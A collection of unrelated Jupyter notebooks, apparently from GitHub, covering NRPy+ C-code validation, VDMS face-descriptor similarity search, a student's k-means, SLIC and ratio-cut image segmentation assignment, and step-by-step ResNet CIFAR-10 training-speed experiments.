+four_metric_Cp1\
+four_metric_deriv[i]\
+outputC(GRHD.S_tilde_source_termD[i],"Stilde_rhsD"+str(i),"returnstring",params=outCparams).replace("IDX4","IDX4S")\
+write_final_quantity[i],
loopopts ="InteriorPoints",
rel_path_to_Cparams=os.path.join("../"))
```
<a id='code_validation'></a>
# Step 2: Code Validation against original C code \[Back to [top](#toc)\]
$$\label{code_validation}$$
To validate the code in this tutorial we check for agreement between the files
1. that were written in this tutorial and
1. those that are stored in `GiRaFFE_NRPy/GiRaFFE_Ccode_library` or generated by `GiRaFFE_NRPy_A2B.py`
```
# Declare gridfunctions necessary to generate the C code:
gammaDD = ixp.register_gridfunctions_for_single_rank2("AUXEVOL","gammaDD","sym01",DIM=3)
betaU = ixp.register_gridfunctions_for_single_rank1("AUXEVOL","betaU",DIM=3)
alpha = gri.register_gridfunctions("AUXEVOL","alpha",DIM=3)
BU = ixp.register_gridfunctions_for_single_rank1("AUXEVOL","BU",DIM=3)
ValenciavU = ixp.register_gridfunctions_for_single_rank1("AUXEVOL","ValenciavU",DIM=3)
StildeD = ixp.register_gridfunctions_for_single_rank1("EVOL","StildeD",DIM=3)
# Declare this symbol:
sqrt4pi = par.Cparameters("REAL",thismodule,"sqrt4pi","sqrt(4.0*M_PI)")
# First, we generate the file using the functions written in this notebook:
outCparams = "outCverbose=False"
write_out_functions_for_StildeD_source_term(outdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi)
# Define the directory that we wish to validate against:
valdir = os.path.join("GiRaFFE_NRPy","GiRaFFE_Ccode_library","RHSs")
cmd.mkdir(valdir)
import GiRaFFE_NRPy.GiRaFFE_NRPy_Source_Terms as source
source.write_out_functions_for_StildeD_source_term(valdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi)
import difflib
import sys
print("Printing difference between original C code and this code...")
# Open the files to compare
files = ["calculate_StildeD0_source_term.h","calculate_StildeD1_source_term.h","calculate_StildeD2_source_term.h"]
for file in files:
print("Checking file " + file)
with open(os.path.join(valdir,file)) as file1, open(os.path.join(outdir,file)) as file2:
# Read the lines of each file
file1_lines = file1.readlines()
file2_lines = file2.readlines()
num_diffs = 0
for line in difflib.unified_diff(file1_lines, file2_lines, fromfile=os.path.join(valdir+file), tofile=os.path.join(outdir+file)):
sys.stdout.writelines(line)
num_diffs = num_diffs + 1
if num_diffs == 0:
print("No difference. TEST PASSED!")
else:
print("ERROR: Disagreement found with .py file. See differences above.")
sys.exit(1)
```
<a id='latex_pdf_output'></a>
# Step 3: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\]
$$\label{latex_pdf_output}$$
The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename
[Tutorial-GiRaFFE_NRPy_C_code_library-Source_Terms](TTutorial-GiRaFFE_NRPy_C_code_library-Source_Terms.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.)
```
import cmdline_helper as cmd # NRPy+: Multi-platform Python command-line interface
cmd.output_Jupyter_notebook_to_LaTeXed_PDF("Tutorial-GiRaFFE_NRPy-Source_Terms",location_of_template_file=os.path.join(".."))
```
|
github_jupyter
|
# Find Descriptors (Matching)
Similar to classification, VDMS supports feature vector search based on similariy matching as part of its API.
In this example, where we have a pre-load set of feature vectors and labels associated,
we can search for similar feature vectors, and query information related to it.
We will start by taking a new image, not seeing by VDMS before (FIX THIS),
find the faces on it, and run feature vector extraction, and finding images related to it:
```
import getDescriptors as g
imagePath = "images/1.jpg"
descriptors = g.get_descriptors(imagePath)
```
Now that we have the new faces and its feature vectors, we can ask VDMS to return the similar descriptors.
But first, let's connect to VDMS:
```
import vdms
db = vdms.vdms()
db.connect("localhost")
```
We can now search for similar descriptors by passing the descriptor of the face to VDMS as follows:
```
import numpy as np
import json
import util
who_is_this = descriptors[1] # Number 1 is Tom's face
blob_array = []
query = """
[
{
"FindDescriptor" : {
"set": "hike_mt_rainier",
"_ref": 33,
"k_neighbors": 4,
"results": {
"list": ["_distance", "_id", "_label"]
}
}
}
]
"""
blob_array.append(who_is_this)
response, images = db.query(query, [blob_array])
print (db.get_last_response_str())
```
Now that we can see this similar descriptors, let's go one step further and retrieve the images asociated with those descriptors:
```
blob_array = []
query = """
[
{
"FindDescriptor" : {
"set": "hike_mt_rainier",
"_ref": 33,
"k_neighbors": 5,
"results": {
"list": ["_distance", "_id"]
}
}
},
{
"FindImage" : {
"link": { "ref": 33 },
"operations": [
{
"type": "resize",
"height": 200,
"width": 200
}
],
"results": {
"list": ["name_file"]
}
}
}
]
"""
blob_array.append(who_is_this)
response, images = db.query(query, [blob_array])
util.display_images(images)
print ("Number of images:", len(images))
%%javascript
IPython.OutputArea.prototype._should_scroll = function(lines) {
return false;
}
import vdms
import numpy as np
import json
db = vdms.vdms()
db.connect("localhost")
who_is_this = descriptors[1]
blob_array = []
query = """
[
{
"FindDescriptor" : {
"set": "hike_mt_rainier",
"_ref": 33,
"k_neighbors": 1,
"results": {
"list": ["_distance", "_id"]
}
}
},
{
"FindEntity" : {
"class": "Person",
"link": { "ref": 33 },
"_ref": 34,
"results": {
"list": ["name", "lastname"]
}
}
},
{
"FindImage" : {
"link": { "ref": 34 },
"operations": [
{
"type": "resize",
"height": 300,
"width": 300
}
],
"results": {
"list": ["name_file"]
}
}
}
]
"""
blob_array.append(who_is_this)
response, images = db.query(query, [blob_array])
util.display_images(images)
print ("Number of images:", len(images))
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/Vinit-source/CSL7382-Medical-image-clustering-assignment.py/blob/main/problem_code.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Problem
Implement the **k-means**, **SLIC**, and **Ratio Cut** algorithms for segmenting a given bioimage into multiple segments. Use attached image or any other bioimage to show the segmentation results of your algorithms.
Utility Functions
```
def visualize_clusters(image, labels, n_clusters, subp):
# convert to the shape of a vector of pixel values
masked_image = np.copy(image)
masked_image = masked_image.reshape((-1, 3))
labels = labels.flatten()
for i in range(n_clusters):
# color (i.e cluster) to disable
cluster = i
masked_image[labels == cluster] = [255-150*i, 255-60*i, 155+3*i]
# convert back to original shape
masked_image = masked_image.reshape(image.shape)
# show the image
plt.subplot(subp).imshow(masked_image)
plt.axis('off')
def plot_segmented_image( img, labels, num_clusters, subp):
labels = labels.reshape( img.shape[:2] )
plt.subplot(subp).imshow(img)
plt.axis('off')
for l in range( num_clusters ):
try:
plt.subplot(subp).contour( labels == l, levels=1, colors=[plt.get_cmap('coolwarm')( l / float( num_clusters ))] )
except ValueError: #raised if `y` is empty.
pass
```
# K-Means
```
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
class KMeansClustering:
def runKMeans(self, intensities: np.ndarray, n_clusters: int, n_iterations: int = 20) -> (list, np.array):
'''
The KMeans clustering algorithm.
Returns:
cluster_labels: list of labels for each point.
'''
self.n_clusters = n_clusters
self.init_centroids(intensities)
print('Running KMeans...')
for i in range(n_iterations):
cluster_int, cluster_ind = self.allocate(X, intensities)
self.update_centroids(cluster_int)
labels = np.empty((intensities.shape[0]))
for i in range(n_clusters):
labels[cluster_ind[i]] = i
return labels, self.centroids
def init_centroids(self, intensities: np.ndarray):
'''
Initialize centroids with random examples (or points) from the dataset.
'''
#Number of examples
l = intensities.shape[0]
#Initialize centroids array with points from intensities with random indices chosen from 0 to number of examples
rng = np.random.default_rng()
self.centroids = intensities[rng.choice(l, size=self.n_clusters, replace=False)]
self.centroids.astype(np.float32)
def allocate(self, X: np.ndarray, intensities):
'''
This function forms new clusters from the centroids updated in the previous iterations.
'''
#Step 1: Allocate the closest points to the clusters to fill them with atleast one point.
# Allocate the remaining points to the closest clusters
#Calculate the differences in the features between centroids and X using broadcast subtract
res = self.centroids - intensities[:, np.newaxis]
#Find Manhattan distances of each point with all centroids
dist = np.absolute(res)
#Find the closest centroid from each point.
# Find unique indices of the closest points. Using res again for optimization
#not unique indices
res = np.where(dist == dist.min(axis=1)[:, np.newaxis])
#res[0] is used as indices for row-wise indices in res[1]
min_indices = res[1][np.unique(res[0])]
indices = [[] for i in range(self.n_clusters)]
for i, c in enumerate(min_indices):
if not c == -1:
# cluster_array[c] = np.append(cluster_array[c], [X[i]], axis=0) #add the point to the corresponding cluster
indices[c].append(i)
return [intensities[indices[i]] for i in range(self.n_clusters)], indices
def update_centroids(self, cluster_int):
'''
This function updates the centroids based on the updated clusters.
'''
#Make a rough copy
centroids = self.centroids
#Find mean for every cluster
for i in range(self.n_clusters):
if len(cluster_int[i]) > 0:
centroids[i] = np.mean(cluster_int[i])
#Update fair copy
self.centroids = centroids
if __name__ == '__main__':
img = Image.open('f1.png')
plt.figure(figsize=(10,20))
plt.subplot(121).imshow(img)
plt.axis('off')
img = np.array(img)
print(f'img.shape: {img.shape}')
X = []
intensities = []
for i in range(img.shape[0]):
for j in range(img.shape[1]):
X.append([i, j])
intensities.append(np.average(img[i][j]))
X = np.array(X)
intensities = np.array(intensities)
k = 3
KMC = KMeansClustering()
labels, centroids = KMC.runKMeans(intensities, k, 10)
visualize_clusters(img, labels, k, 122)
plt.show()
```
# SLIC
```
import numpy as np
from numpy import linalg as la
from PIL import Image
import sys
import matplotlib.pyplot as plt
from time import perf_counter
class SLIC:
def runSlic(self, X: np.ndarray, intensities: np.ndarray, n_clusters: int, n_iterations: int, lmbda: float) -> list:
'''
The SLIC clustering algorithm.
Returns:
cluster_labels: list of labels for each point.
'''
self.n_clusters = n_clusters
self.init_centroids(X, intensities)
for i in range(n_iterations):
cluster_int, cluster_loc, indices = self.allocate(X, intensities, lmbda)
self.update_centroids(cluster_int, cluster_loc)
labels = np.empty((X.shape[0]))
for i in range(n_clusters):
labels[indices[i]] = i
return labels
def init_centroids(self, X, intensities: np.ndarray):
'''
Initialize centroids with random examples (or points) from the dataset.
'''
#Number of examples
l = intensities.shape[0]
#Initialize centroids array with points from intensities with random indices chosen from 0 to number of examples
rng = np.random.default_rng()
indices = rng.choice(l, size=self.n_clusters, replace=False)
self.centroids_c = X[indices]
self.centroids_i = intensities[indices]
self.centroids_i.astype(np.float32)
def allocate(self, X: np.ndarray, intensities, lmbda):
'''
This function forms new clusters from the centroids updated in the previous iterations.
'''
# Allocate the points to the closest clusters
#Calculate the differences in the features between centroids and X using broadcast subtract
dist = np.absolute(self.centroids_i - intensities[:, np.newaxis]) + lmbda * la.norm(self.centroids_c - X[:, np.newaxis], axis=2)
#Find the closest centroid from each point.
# Find unique indices of the closest points. Using res again for optimization
#not unique indices
res = np.where(dist == dist.min(axis=1)[:, np.newaxis])
#res[0] is used as indices for row-wise indices in res[1]
min_indices = res[1][np.unique(res[0])]
indices = [[] for i in range(self.n_clusters)]
for i, c in enumerate(min_indices):
if not c == -1:
indices[c].append(i)
return [intensities[indices[i]] for i in range(self.n_clusters)], \
[X[indices[i]] for i in range(self.n_clusters)], indices
def update_centroids(self, cluster_int, cluster_loc):
'''
This function updates the centroids based on the updated clusters.
'''
#Make a rough copy
centroids_c = self.centroids_c
centroids_i = self.centroids_i
#Find mean for every cluster
for i in range(self.n_clusters):
if len(cluster_int[i]) > 0:
centroids_i[i] = np.mean(cluster_int[i])
centroids_c[i] = np.mean(cluster_loc[i], axis=0)
#Update fair copy
self.centroids_i = centroids_i
self.centroids_c = centroids_c
if __name__ == '__main__':
img = Image.open('f1.png')
plt.figure(figsize=(10, 20))
plt.subplot('121').imshow(img)
plt.axis('off')
img = np.array(img)
print(f'img.shape: {img.shape}')
X = []
intensities = []
for i in range(img.shape[0]):
for j in range(img.shape[1]):
X.append([i, j])
intensities.append(np.average(img[i][j]))
X = np.array(X)
intensities = np.array(intensities)
k = 25
slic = SLIC()
labels = slic.runSlic(X, intensities, k, 20, 0.25)
visualize_clusters(img, labels, k, 122)
# plot_segmented_image(img, labels, k)
plt.show()
```
# Ratio Cut
```
import numpy as np
from google.colab.patches import cv2_imshow
from PIL import Image
from numpy import linalg as la
import scipy.cluster.vq as vq
import matplotlib.pyplot as plt
import warnings
import math
warnings.simplefilter('ignore')
class Spectralclustering:
def run(self, img, k, LOAD=True, lmbda=0.25, sigma=1):
if not LOAD:
print('Constructing Laplacian matrix...')
L = self.construct_L(img, lmbda, sigma)
print('Performing Eigen Value Decomposition of L...')
l, V = la.eigh( L )
with open('array.npy', 'wb') as fp:
np.save(fp, V, allow_pickle=True)
else:
V = np.load('array.npy')
# First K columns of V need to be clustered
H = V[:,0:k]
if( k==2 ):
# In this case clustering on the Fiedler vector which gives very close approximation
f = H[:,1]
labels = np.ravel( np.sign( f ) )
k=2
else:
# Run K-Means on eigenvector matrix
centroids, labels = vq.kmeans2( H[:,:k], k )
print(f'kmeans2 labels: {labels}')
return labels
def construct_L(self, img: np.ndarray, lmbda: int, sigma: int):
try:
h, w = img.shape[:2]
except AttributeError:
raise('img should be numpy array.')
L = np.zeros((h*w, h*w))
D = np.zeros((h*w,))
for i in range(h):
for j in range(w):
# i - 1, j - 1
if i - 1 >= 0 and j - 1 >= 0:
L[(i - 1) * w + (j - 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j - 1)] = -self.sim(img[i][j], i, j, img[i-1][j-1], i-1, j-1, lmbda, sigma)
D[i * w + j] += 1
D[(i - 1) * w + (j - 1)] += 1
# i - 1, j
if i - 1 >= 0:
L[(i - 1) * w + j][i * w + j] = L[i * w + j][(i - 1) * w + j] = -self.sim(img[i][j], i, j, img[i-1][j], i-1, j, lmbda, sigma)
D[(i - 1) * w + j] += 1
D[i * w + j] += 1
# i - 1, j + 1
if i - 1 >= 0 and j + 1 < w:
L[(i - 1) * w + (j + 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j + 1)] = -self.sim(img[i][j], i, j, img[i-1][j+1], i-1, j+1, lmbda, sigma)
D[(i - 1) * w + (j + 1)] += 1
D[i * w + j] += 1
# i, j - 1
if j - 1 >= 0:
L[i * w + (j - 1)][i * w + j] = L[i * w + j][i * w + (j - 1)] = -self.sim(img[i][j], i, j, img[i][j-1], i, j-1, lmbda, sigma)
D[i * w + (j - 1)] += 1
D[i * w + j] += 1
for i in range(h):
for j in range(w):
L[i * w + j][i * w + j] = D[i * w + j]
return L
def sim(self, x1, i1, j1, x2, i2, j2, lmbda = 0.25, sigma = 1):
dist = np.linalg.norm([x1 - x2]) + lmbda * np.linalg.norm([i1 - i2, j1 - j2])
return math.exp(-(dist/sigma**2))
if __name__ == '__main__':
img = Image.open('/content/f1.png')
k = 10
LOAD = False
# '''
# --------------------------------------
# CODE TO RESIZE ARRAY TO LOWER SIZE
# ORIGINAL IMAGE WAS EXCEEDING MEMORY
# --------------------------------------
basewidth = 100
wpercent = (basewidth/float(img.size[0]))
hsize = int((float(img.size[1])*float(wpercent)))
img = img.resize((basewidth,hsize), Image.ANTIALIAS)
# Convert image to grayscale
gray = img.convert('L')
# Normalise image intensities to [0,1] values
gray = np.asarray(gray).astype(float)/255.0
# gray = np.array([[0, 1, 0], [1,0,1], [0,1,0]], dtype=float)
s = Spectralclustering()
labels = s.run(gray, k, LOAD=LOAD, lmbda=0.25, sigma=1)
# labels = labels.reshape( gray.shape )
# plot_segmented_image( img, labels, k, None, 'Spectral Clustering' )
img = np.array(img)
plt.figure(figsize=(10, 30))
plt.subplot(131).imshow(img)
plt.axis('off')
visualize_clusters(img, labels, k,132)
plot_segmented_image(img, labels, k, 133)
plt.show()
```
### Library Function
```
# import kmeans
import numpy as np
from google.colab.patches import cv2_imshow
from PIL import Image
from numpy import linalg as la
import scipy.cluster.vq as vq
import matplotlib.pyplot as plt
import warnings
import math
import logging
from sklearn.cluster import SpectralClustering
warnings.simplefilter('ignore')
def sim(x1, i1, j1, x2, i2, j2, lmbda = 0.25, sigma = 1):
dist = np.linalg.norm([x1 - x2]) + lmbda * np.linalg.norm([i1 - i2, j1 - j2])
return math.exp(-(dist/sigma**2))
def construct_W(img: np.ndarray, lmbda: float, sigma: float):
try:
h, w = img.shape[:2]
except AttributeError:
raise('img should be numpy array.')
L = np.zeros((h*w, h*w))
D = np.zeros((h*w,))
for i in range(h):
for j in range(w):
# i - 1, j - 1
if i - 1 >= 0 and j - 1 >= 0:
L[(i - 1) * w + (j - 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j - 1)] = sim(img[i][j], i, j, img[i-1][j-1], i-1, j-1, lmbda, sigma)
# i - 1, j
if i - 1 >= 0:
L[(i - 1) * w + j][i * w + j] = L[i * w + j][(i - 1) * w + j] = sim(img[i][j], i, j, img[i-1][j], i-1, j, lmbda, sigma)
# i - 1, j + 1
if i - 1 >= 0 and j + 1 < w:
L[(i - 1) * w + (j + 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j + 1)] = sim(img[i][j], i, j, img[i-1][j+1], i-1, j+1, lmbda, sigma)
# i, j - 1
if j - 1 >= 0:
L[i * w + (j - 1)][i * w + j] = L[i * w + j][i * w + (j - 1)] = sim(img[i][j], i, j, img[i][j-1], i, j-1, lmbda, sigma)
return L
def visualize_clusters_r(image, labels, n_clusters, subp):
# convert to the shape of a vector of pixel values
masked_image = np.copy(image)
labels = labels.flatten()
masked_image = masked_image.reshape(-1)
for i in range(n_clusters):
# color (i.e cluster) to disable
cluster = i
masked_image[labels == cluster] = 255-20*i
# convert back to original shape
masked_image = masked_image.reshape(image.shape)
# show the image
plt.subplot(subp).imshow(masked_image)
plt.axis('off')
if __name__ == '__main__':
img = Image.open('/content/f1.png')
k = 5
# --------------------------------------
# CODE TO RESIZE ARRAY TO LOWER SIZE
# ORIGINAL IMAGE WAS EXCEEDING MEMORY
# --------------------------------------
basewidth = 100
wpercent = (basewidth/float(img.size[0]))
hsize = int((float(img.size[1])*float(wpercent)))
img = img.resize((basewidth,hsize), Image.ANTIALIAS)
plt.figure(figsize=(10, 30))
plt.subplot(131).imshow(img)
plt.axis('off')
# Convert image to grayscale
img = img.convert('L')
# Normalise image intensities to [0,1] values
img = np.asarray(img).astype(float)/255.0
# img = np.array([[0, 1, 0], [1,0,1], [0,1,0]], dtype=float)
logging.debug(f'img:{img}\nimg.shape: {img.shape}')
W = construct_W(img, 0, 1)
sc = SpectralClustering(k, affinity='precomputed', n_init=10,
assign_labels='kmeans')
labels = sc.fit_predict(W)
visualize_clusters_r(img, labels, k, 132)
plot_segmented_image( img, labels, k, 133)
plt.show()
```
|
github_jupyter
|
```
!sudo nvidia-persistenced
!sudo nvidia-smi -ac 877,1530
from IPython.core.display import display, HTML
display(HTML("<style>.container {width:95% !important;}</style>"))
from core import *
from torch_backend import *
colors = ColorMap()
draw = lambda graph: display(DotGraph({p: ({'fillcolor': colors[type(v)], 'tooltip': repr(v)}, inputs) for p, (v, inputs) in graph.items() if v is not None}))
```
### Network definitions
```
batch_norm = partial(BatchNorm, weight_init=None, bias_init=None)
def res_block(c_in, c_out, stride, **kw):
block = {
'bn1': batch_norm(c_in, **kw),
'relu1': nn.ReLU(True),
'branch': {
'conv1': nn.Conv2d(c_in, c_out, kernel_size=3, stride=stride, padding=1, bias=False),
'bn2': batch_norm(c_out, **kw),
'relu2': nn.ReLU(True),
'conv2': nn.Conv2d(c_out, c_out, kernel_size=3, stride=1, padding=1, bias=False),
}
}
projection = (stride != 1) or (c_in != c_out)
if projection:
block['conv3'] = (nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False), ['relu1'])
block['add'] = (Add(), [('conv3' if projection else 'relu1'), 'branch/conv2'])
return block
def DAWN_net(c=64, block=res_block, prep_bn_relu=False, concat_pool=True, **kw):
if isinstance(c, int):
c = [c, 2*c, 4*c, 4*c]
classifier_pool = {
'in': Identity(),
'maxpool': nn.MaxPool2d(4),
'avgpool': (nn.AvgPool2d(4), ['in']),
'concat': (Concat(), ['maxpool', 'avgpool']),
} if concat_pool else {'pool': nn.MaxPool2d(4)}
return {
'input': (None, []),
'prep': union({'conv': nn.Conv2d(3, c[0], kernel_size=3, stride=1, padding=1, bias=False)},
{'bn': batch_norm(c[0], **kw), 'relu': nn.ReLU(True)} if prep_bn_relu else {}),
'layer1': {
'block0': block(c[0], c[0], 1, **kw),
'block1': block(c[0], c[0], 1, **kw),
},
'layer2': {
'block0': block(c[0], c[1], 2, **kw),
'block1': block(c[1], c[1], 1, **kw),
},
'layer3': {
'block0': block(c[1], c[2], 2, **kw),
'block1': block(c[2], c[2], 1, **kw),
},
'layer4': {
'block0': block(c[2], c[3], 2, **kw),
'block1': block(c[3], c[3], 1, **kw),
},
'final': union(classifier_pool, {
'flatten': Flatten(),
'linear': nn.Linear(2*c[3] if concat_pool else c[3], 10, bias=True),
}),
'logits': Identity(),
}
def conv_bn(c_in, c_out, bn_weight_init=1.0, **kw):
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False),
'bn': batch_norm(c_out, bn_weight_init=bn_weight_init, **kw),
'relu': nn.ReLU(True)
}
def basic_net(channels, weight, pool, **kw):
return {
'input': (None, []),
'prep': conv_bn(3, channels['prep'], **kw),
'layer1': dict(conv_bn(channels['prep'], channels['layer1'], **kw), pool=pool),
'layer2': dict(conv_bn(channels['layer1'], channels['layer2'], **kw), pool=pool),
'layer3': dict(conv_bn(channels['layer2'], channels['layer3'], **kw), pool=pool),
'pool': nn.MaxPool2d(4),
'flatten': Flatten(),
'linear': nn.Linear(channels['layer3'], 10, bias=False),
'logits': Mul(weight),
}
def net(channels=None, weight=0.125, pool=nn.MaxPool2d(2), extra_layers=(), res_layers=('layer1', 'layer3'), **kw):
channels = channels or {'prep': 64, 'layer1': 128, 'layer2': 256, 'layer3': 512}
residual = lambda c, **kw: {'in': Identity(), 'res1': conv_bn(c, c, **kw), 'res2': conv_bn(c, c, **kw),
'add': (Add(), ['in', 'res2/relu'])}
n = basic_net(channels, weight, pool, **kw)
for layer in res_layers:
n[layer]['residual'] = residual(channels[layer], **kw)
for layer in extra_layers:
n[layer]['extra'] = conv_bn(channels[layer], channels[layer], **kw)
return n
remove_identity_nodes = lambda net: remove_by_type(net, Identity)
```
### Download and preprocess data
```
DATA_DIR = './data'
dataset = cifar10(DATA_DIR)
timer = Timer()
print('Preprocessing training data')
transforms = [
partial(normalise, mean=np.array(cifar10_mean, dtype=np.float32), std=np.array(cifar10_std, dtype=np.float32)),
partial(transpose, source='NHWC', target='NCHW'),
]
train_set = list(zip(*preprocess(dataset['train'], [partial(pad, border=4)] + transforms).values()))
print(f'Finished in {timer():.2} seconds')
print('Preprocessing test data')
test_set = list(zip(*preprocess(dataset['valid'], transforms).values()))
print(f'Finished in {timer():.2} seconds')
```
### Training loop
```
def train(model, lr_schedule, train_set, test_set, batch_size, num_workers=0):
train_batches = DataLoader(train_set, batch_size, shuffle=True, set_random_choices=True, num_workers=num_workers)
test_batches = DataLoader(test_set, batch_size, shuffle=False, num_workers=num_workers)
lr = lambda step: lr_schedule(step/len(train_batches))/batch_size
opts = [SGD(trainable_params(model).values(), {'lr': lr, 'weight_decay': Const(5e-4*batch_size), 'momentum': Const(0.9)})]
logs, state = Table(), {MODEL: model, LOSS: x_ent_loss, OPTS: opts}
for epoch in range(lr_schedule.knots[-1]):
logs.append(union({'epoch': epoch+1, 'lr': lr_schedule(epoch+1)},
train_epoch(state, Timer(torch.cuda.synchronize), train_batches, test_batches)))
return logs
```
### [Post 1: Baseline](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_1/) - DAWNbench baseline + no initial bn-relu+ efficient dataloading/augmentation, 1 dataloader process (301s)
```
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.1, 0.005, 0])
batch_size = 128
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device)
#convert all children including batch norms to half precision (triggering slow codepath!)
for v in model.children():
v.half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=1)
```
### [Post 1: Baseline](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_1/) - 0 dataloader processes (297s)
```
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.1, 0.005, 0])
batch_size = 128
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device)
#convert all children including batch norms to half precision (triggering slow codepath!)
for v in model.children():
v.half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 2: Mini-batches](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_2/) - batch size=512 (256s)
```
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.44, 0.005, 0])
batch_size = 512
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device)
#convert all children including batch norms to half precision (triggering slow codepath!)
for v in model.children():
v.half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - speed up batch norms (186s)
```
lr_schedule = PiecewiseLinear([0, 15, 30, 35], [0, 0.44, 0.005, 0])
batch_size = 512
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR()])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - cutout+30 epochs+batch_size=512 (161s)
```
lr_schedule = PiecewiseLinear([0, 8, 30], [0, 0.4, 0])
batch_size = 512
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 3: Regularisation](https://www.myrtle.ai/2018/09/24/how_to_train_your_resnet_3/) - batch_size=768 (154s)
```
lr_schedule = PiecewiseLinear([0, 8, 30], [0, 0.6, 0])
batch_size = 768
n = DAWN_net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone (36s; test acc 55.9%)
It seems reasonable to study how the shortest path through the network trains in isolation and to take steps to improve this before adding back the longer branches.
Eliminating the long branches yields the following backbone network in which all convolutions, except for the initial one, have a stride of two.
Training the shortest path network for 20 epochs yields an unimpressive test accuracy of 55.9% in 36 seconds.
```
def shortcut_block(c_in, c_out, stride, **kw):
block = {
'bn1': batch_norm(c_in, **kw),
'relu1': nn.ReLU(True),
}
projection = (stride != 1) or (c_in != c_out)
if projection:
block['conv3'] = (nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False), ['relu1'])
return block
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(block=shortcut_block)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, remove repeat bn-relu (32s; test acc 56.0%)
Removing the repeated batch norm-ReLU groups, reduces training time to 32s and leaves test accuracy approximately unchanged.
```
def shortcut_block(c_in, c_out, stride, **kw):
projection = (stride != 1) or (c_in != c_out)
if projection:
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=1, stride=stride, padding=0, bias=False),
'bn': batch_norm(c_out, **kw),
'relu': nn.ReLU(True),
}
else:
return {'id': Identity()}
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(block=shortcut_block, prep_bn_relu=True)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, 3x3 convs (36s; test acc 85.6%)
A serious shortcoming of this network is that the downsampling convolutions have 1x1 kernels and a stride of two, so that rather than enlarging the receptive field they are simply discarding information.
If we replace these with 3x3 convolutions, things improve considerably and test accuracy after 20 epochs is 85.6% in a time of 36s.
```
def shortcut_block(c_in, c_out, stride, **kw):
projection = (stride != 1) or (c_in != c_out)
if projection:
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=stride, padding=1, bias=False),
'bn': batch_norm(c_out, **kw),
'relu': nn.ReLU(True),
}
else:
return {'id': Identity()}
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(block=shortcut_block, prep_bn_relu=True)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, maxpool downsampling (43s; test acc 89.7%)
We can further improve the downsampling stages by applying 3x3 convolutions of stride one followed by a pooling layer instead of using strided convolutions.
We choose max pooling with a 2x2 window size leading to a final test accuracy of 89.7% after 43s. Using average pooling gives a similar result but takes slightly longer.
```
def shortcut_block(c_in, c_out, stride, **kw):
